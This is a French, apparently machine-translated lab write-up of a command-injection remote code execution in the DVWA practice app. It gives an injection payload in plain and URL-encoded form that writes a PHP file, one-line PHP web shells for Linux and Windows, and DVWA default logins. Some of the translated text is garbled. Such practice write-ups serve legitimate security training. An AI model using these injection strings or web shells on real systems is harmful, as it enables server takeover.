[Récurrence de vulnérabilité] RCE causé par un accès non autorisé à DVWA au stand de tir

1Adresse de la vulnérabilité :

http://xxxx.vom/vulnerabilities/exec/source/low.php

2 Raisons de la vulnérabilité :

Épissage direct d'exécution de commande

3 Vérification des vulnérabilités

Linux écrit phpinfo(); dans le répertoire hackable/uploads/ (vous pouvez également l'écrire directement dans le répertoire courant)
contenu en texte brut :
1&echo « <?php phpinfo();?> » > …/…/…/hackable/ uploads/4.
Exploit après
 : ip=%31%26%65%63%68%6f%20%22%3c%3f%70%68%70%20%70%68%70%69%6e% 66%6f %28%29%3b%3f%3e%22%20%3e%20%2e%2e%2f%2e%2e%2f%2e%2e%2f%68%61%63%6b%61% 62%6c %65%2f%75%70%6c%6f%61%64%73%2f%34%2e%70%68%70&Submit=Soumettre
Insérer la description de l'image ici

Linux écrit une phrase cheval de Troie :

echo '<? php @eval($_POST["x"]); ?>' >shell.php

Windows écrit une phrase pour empêcher le navigateur d'écrire des échappements, alors ajoutez ^ :

echo ^<? php @eval($_POST['x']); ?^> >shell.php

4.Mot de passe par défaut

Il semble que vous puissiez vous connecter directement avec le mot de passe par défaut.
gordonb/abc123
1337/charley
pablo/letmein
smithy/mot de passe

Je suppose que tu aimes

Origine blog.csdn.net/weixin_54430466/article/details/131527163
conseillé
Classement